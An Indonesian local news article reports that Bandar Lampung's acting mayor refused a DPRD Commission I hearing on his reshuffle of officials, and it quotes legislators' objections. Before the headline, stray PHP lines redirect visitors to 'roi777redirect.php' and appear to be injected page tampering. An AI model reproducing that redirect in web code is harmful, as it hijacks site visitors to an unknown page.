header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Ini Alasan Plt.Walikota Enggan Penuhi Panggilan DPRD Terkait Roling Jabatan  -
Ini Alasan Plt.Walikota Enggan Penuhi Panggilan DPRD Terkait Roling Jabatan 

TRANSLAMPUNG.COM, BANDARLAMPUNG – Jadwal dengar Pendapat (Hearing) antara pihak Komisi I DPRD dengan Plt Walikota Bandarlampung M Yusuf Kohar yang sudah di rencanakan pada hari ini (Jum,at 13/4) di pastikan batal dilaksanakan.

Batalnya hearing ini lataran Plt Walikota enggan menghadiri undangan pihak Komisi I DPRD dengan alasan hal yang akan di bahas bukan wewenang dari pihak legislatif.

“Saya tidak akan datang karna hal ini bukan ranah dari pihak legislatif apa yang saya lakukan sudah melalui prosedur dari mendagri,” kata Yusuf Kohar saat dihubungi , Jumat (14/4/2018)

Sementara ketua Komisi I DPRD Nu’man Abdi mengatakan bahwa pihak DPRD ingin melakukan pemanggilan Plt.Walikota untuk mebicarakan kebijakan yang di ambil oleh Plt Wali Kota M Yusuf kohar namun dengan tidak hadirnya plt sangat di sayangkan oleh pihak Komisi I DPRD.

“Kalaupun alasan Plt enggan hadir lataran masalah ini bukan kewenagan pihak Legislatif,tidak jadi masalah tapi kami di DPRD punya tiga hak yakni hak untuk bertanya ,hak angket, dan hak menjalankan pungsi pengawasan “,kata Nu’Man Abdi Jum,at (13/4/2018).

Menurut Nu,man Abdi menjelaskan bahwa dalam hearing Komisi I dengan Plt.Walikota ini untuk mempertanyakan landasan plt melakukan penggantian stuktur jabatan yang telah di lakukan plt wali kota.

“Kalaupun hal yang di lakukan oleh Plt sudah sesuai aturan yang ada tentunya tidaka jadi masalah tapi kita wajar-wajar saja kalau ingin sering dengan Plt namun kita juga akan mempertanyakan mekanisme  pengatian Plt Dinas Penanaman Modal dan PerizinanTerpadu Satu Pintu (DPMPTPS) apakah sudah sesuai dengan aturan yang ada ,”ucapnya.

Hal senada juga di ungkapkan oleh anggota komisi I Barlian Mansyur mengatakan bahwa pihak komisi I sangat menyayangkan ketidak hadirnya M Yusuf kohar selaku Plt Walikota dalam hearing yang sudah di jadwalkan pihak komisi I.

“Inikan menjadi pertanyaan besar bagi kami kenapa Plt tidak mau hadir dalam hearing ini kalaupun alasanya hal ini bukan wewenag legislatif jadi apa pungsi kita di DPRD ini ,seharusnya kan kalau tidak mau hadir Plt bisa memerintahkan Asisten yang mengadirnya supaya apa kita pertanyakan bisa di sampaikan ,”ujarnya.

Yang jelas lanjut Barlian Manysur pihak DPRD akan melakukan pemangilan kembali kepada Plt.Walikota kalaupun hal ini masih juga di indahkan makan kami DPRD tentunya akan mengunakan tiga hak kami, “pungkasnya. (ydn)

News Reporter